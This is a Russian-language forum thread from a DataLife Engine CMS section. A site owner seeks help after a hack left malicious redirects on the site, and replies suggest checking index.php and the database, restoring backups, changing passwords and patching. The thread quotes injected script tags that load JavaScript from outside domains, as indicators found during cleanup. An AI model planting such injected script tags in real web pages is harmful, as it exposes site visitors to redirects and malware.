Помощь Внедрение вредоносного кода

Тема в разделе "DLE", создана пользователем GIwild, 30 июл 2011.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. GIwild

    GIwild Постоялец

    Регистр.:
    6 май 2006
    Сообщения:
    116
    Симпатии:
    6
    Здравствуйте, возникла следующая проблема:

    яндекс выкинул сайт из поиска, я им написал письмо и получил ответ, что в структуре сайта находится вредоносный код, который ведет на другой сайт, захожу на сайт как обычно все нормально, а сегодня попробовал через поисковик набрав lcg.kz и точно при переходе выкидывает на вот этот сайт

    уважаемые подскажите какие файлы нужно смотреть и что туда могли внедрить?

    Всем за ранее спасибо!!!
     
  2. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    188
    Очень похоже, что установлен Модуль Переходы старой версии в котором есть дыры
     
  3. GIwild

    GIwild Постоялец

    Регистр.:
    6 май 2006
    Сообщения:
    116
    Симпатии:
    6
    Стояла версия переходы 8.7 удалил все полностью что касалось этого модуля, проблема осталась :(
     
  4. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    188
    Просмотрите код страницы на наличие постороннего кода по типу
    HTML:
    <script src=http://oj1p.narod.ru/t.js></script>
     
  5. GIwild

    GIwild Постоялец

    Регистр.:
    6 май 2006
    Сообщения:
    116
    Симпатии:
    6
    Если смотреть через оперу исходный код, то нашел следующее
    HTML:
    <body><script src=http://promediagroup.ru/d.js></script><!--<div id="loading-layer" style="display:none"><div id="loading-layer-text">Загрузка. Пожалуйста, подождите...</div></div>
    но когда смотрю просто файл main.tpl то вижу только вот этот код
    HTML:
    <body>{AJAX}
    откуда появилась эта херь и как ее убрать

    HTML:
    <script src=http://promediagroup.ru/d.js></script>
     
  6. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    188
    Посмотрите в файле index.php - вероятнее всего код именно там
     
  7. Prill

    Prill Читатель

    Заблокирован
    Регистр.:
    3 июн 2011
    Сообщения:
    52
    Симпатии:
    4
    скачай файли движка на комп себе и поисчи promediagroup.ru по всем файлам, но лучше всего замени все файли движка на чистие копии
     
  8. Kalb Raa_Lb

    Kalb Raa_Lb Постоялец

    Регистр.:
    5 май 2009
    Сообщения:
    102
    Симпатии:
    25
    не обязательно в файлах движка - могли и в базу запросто записать,

    а просто менять файлы на читые лучше не надо найди сначала где урл находится с помощью простого тотал командера бесплатного (скачаешь и ищешь там даже функции поиска есть в файлах разные) и почисти + закрой дырки :) а то снова появится эта дрянь (ко мне на один новостийник так раз 5 заливали - пока я ленился заплатки поставить :D)
     
  9. асс

    асс

    Регистр.:
    13 окт 2006
    Сообщения:
    756
    Симпатии:
    221
    открой Index.php в корне и там в само низу дожен быть этот код, у меня сегодня на одном са1те тож нашел такой.
    Хрен знает как его ломают, но дыры где то есть.
     
  10. gunkin

    gunkin Постоялец

    Регистр.:
    24 июн 2008
    Сообщения:
    60
    Симпатии:
    10
    Лучше с бекапа восстановить, сменить пароли (админка, хостинг, БД) и обновить версию, чтобы дыры закрыть. Танцы с кодом в файлах - долго, инфицируются как правило все файлы *.js и *.php (был случай). А вот если в БД вирус или ссылка на вирус - это вообще как лечить?
     
Статус темы:
Закрыта.